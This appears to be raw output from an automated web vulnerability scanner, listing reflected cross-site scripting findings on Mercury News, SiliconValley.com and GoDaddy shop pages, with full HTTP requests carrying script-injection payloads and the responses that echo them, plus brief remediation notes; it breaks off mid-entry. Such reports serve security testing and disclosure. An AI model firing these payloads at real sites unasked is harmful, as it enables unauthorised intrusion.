HTTP/1.0 404 Not Found Date: Mon, 15 Nov 2010 02:09:38 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0QISC2X0JL2UMCUUCBWCFFI; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... rBrand = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: login6fb02</script><script>alert(1)</script>47f9d8515fe"; var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 586df"><script>alert(1)</script>cb76424f007 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registration/?rPage=login&url=http%3A%2F%2Fwww.mercurynews.com%2F586df"><script>alert(1)</script>cb76424f007&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 02:09:39 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=XBSY2AYHL45GQCUUCAWSFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... <a href="/registration?rPage=register&url=http://www.mercurynews.com/586df"><script>alert(1)</script>cb76424f007®ister=yes"> ...[SNIP]...
The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6715d</script><script>alert(1)</script>1b9e22d4bd9 was submitted in the rPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration/?rPage=login6715d</script><script>alert(1)</script>1b9e22d4bd9&url=http%3A%2F%2Fwww.siliconvalley.com%2F&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.siliconvalley.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 15 Nov 2010 02:09:40 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=LX5GZDZ3HBPL0CUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!-- ...[SNIP]... rBrand = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: login6715d</script><script>alert(1)</script>1b9e22d4bd9"; var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c8a"><script>alert(1)</script>4c191ca7cfb was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registration/?rPage=login&url=http%3A%2F%2Fwww.siliconvalley.com%2F13c8a"><script>alert(1)</script>4c191ca7cfb&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.siliconvalley.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 02:09:41 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=4ISA2QSZCYI1ECUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!-- ...[SNIP]... <a href="/registration?rPage=register&url=http://www.siliconvalley.com/13c8a"><script>alert(1)</script>4c191ca7cfb®ister=yes"> ...[SNIP]...
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73226"%3balert(1)//8a48a0b359e was submitted in the isc parameter. This input was echoed as 73226";alert(1)//8a48a0b359e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/?isc=GPPT03A09273226"%3balert(1)//8a48a0b359e&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 177018 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=533i2z55uu1dxfvfftthjh55; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Fri, 19-Nov-2010 23:17:37 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Tue, 14-Dec-2010 23:17:38 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:17:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d886"style%3d"x%3aexpression(alert(1))"2c644fcb8ea was submitted in the isc parameter. This input was echoed as 1d886"style="x:expression(alert(1))"2c644fcb8ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/?isc=GPPT03A0921d886"style%3d"x%3aexpression(alert(1))"2c644fcb8ea&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 179107 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=m3otdjbtjn0j1jaaieauxc55; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Fri, 19-Nov-2010 23:17:24 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Tue, 14-Dec-2010 23:17:24 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:17:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e038"%3balert(1)//b62314b1d25 was submitted in the isc parameter. This input was echoed as 5e038";alert(1)//b62314b1d25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/?isc=GPPT02C0215e038"%3balert(1)//b62314b1d25&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 180898 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=mznsn145q0mxr0vyei2mbbbu; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Fri, 19-Nov-2010 23:16:32 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Tue, 14-Dec-2010 23:16:32 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C0215e038";alert(1)//b62314b1d25&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f7"style%3d"x%3aexpression(alert(1))"bebbc1845c3 was submitted in the isc parameter. This input was echoed as 214f7"style="x:expression(alert(1))"bebbc1845c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/?isc=GPPT02C021214f7"style%3d"x%3aexpression(alert(1))"bebbc1845c3&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 182987 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=r5khpde40hdl1y55kfe0vo55; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Fri, 19-Nov-2010 23:16:19 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Tue, 14-Dec-2010 23:16:19 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94034"style%3d"x%3aexpression(alert(1))"3c8f6d48244 was submitted in the isc parameter. This input was echoed as 94034"style="x:expression(alert(1))"3c8f6d48244 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/?isc=GPPT02C02194034"style%3d"x%3aexpression(alert(1))"3c8f6d48244&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 173188 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=2zrwhnzamnwxhzezt4jdh3v5; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Fri, 19-Nov-2010 23:17:02 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Tue, 14-Dec-2010 23:17:02 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:17:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6439"%3balert(1)//fdb982fc19a was submitted in the isc parameter. This input was echoed as c6439";alert(1)//fdb982fc19a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/?isc=GPPT02C021c6439"%3balert(1)//fdb982fc19a&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 170552 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=djnvm2vqgewrps45qyay4j45; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Fri, 19-Nov-2010 23:17:11 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Tue, 14-Dec-2010 23:17:11 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:17:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8266"style%3d"x%3aexpression(alert(1))"29256dd5172 was submitted in the isc parameter. This input was echoed as e8266"style="x:expression(alert(1))"29256dd5172 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Myasiatrade-com/Flotap-t1000/?isc=GPPT02C021e8266"style%3d"x%3aexpression(alert(1))"29256dd5172&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 174449 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=i1pwcp55ajzxrbn5oho1so45; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Fri, 19-Nov-2010 23:16:40 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Tue, 14-Dec-2010 23:16:40 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5995"%3balert(1)//7fede595aaa was submitted in the isc parameter. This input was echoed as e5995";alert(1)//7fede595aaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Myasiatrade-com/Flotap-t1000/?isc=GPPT02C021e5995"%3balert(1)//7fede595aaa&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 172360 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=a0k3unrokggtlhrq10nlirez; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Fri, 19-Nov-2010 23:16:52 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Tue, 14-Dec-2010 23:16:52 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021e5995";alert(1)//7fede595aaa&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c77"%3balert(1)//4ff28e1f667 was submitted in the isc parameter. This input was echoed as b3c77";alert(1)//4ff28e1f667 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/?isc=GPPT03A092b3c77"%3balert(1)//4ff28e1f667&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 171242 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=bg31by45uyjgfz3fgyire0q0; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Fri, 19-Nov-2010 23:19:00 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Tue, 14-Dec-2010 23:19:01 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:19:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563bb"style%3d"x%3aexpression(alert(1))"c4bb47fd256 was submitted in the isc parameter. This input was echoed as 563bb"style="x:expression(alert(1))"c4bb47fd256 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/?isc=GPPT03A092563bb"style%3d"x%3aexpression(alert(1))"c4bb47fd256&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 173331 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=mq0cnx45momxjiqzprsxvxbu; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Fri, 19-Nov-2010 23:18:48 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Tue, 14-Dec-2010 23:18:48 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ad87"style%3d"x%3aexpression(alert(1))"ef69d8537c was submitted in the isc parameter. This input was echoed as 1ad87"style="x:expression(alert(1))"ef69d8537c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/?isc=GPPT02C0211ad87"style%3d"x%3aexpression(alert(1))"ef69d8537c&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 169969 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=ge3fcjaiic3reiiglzahmw45; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Fri, 19-Nov-2010 23:16:15 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Tue, 14-Dec-2010 23:16:15 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0893"%3balert(1)//bec5869f8e5 was submitted in the isc parameter. This input was echoed as a0893";alert(1)//bec5869f8e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
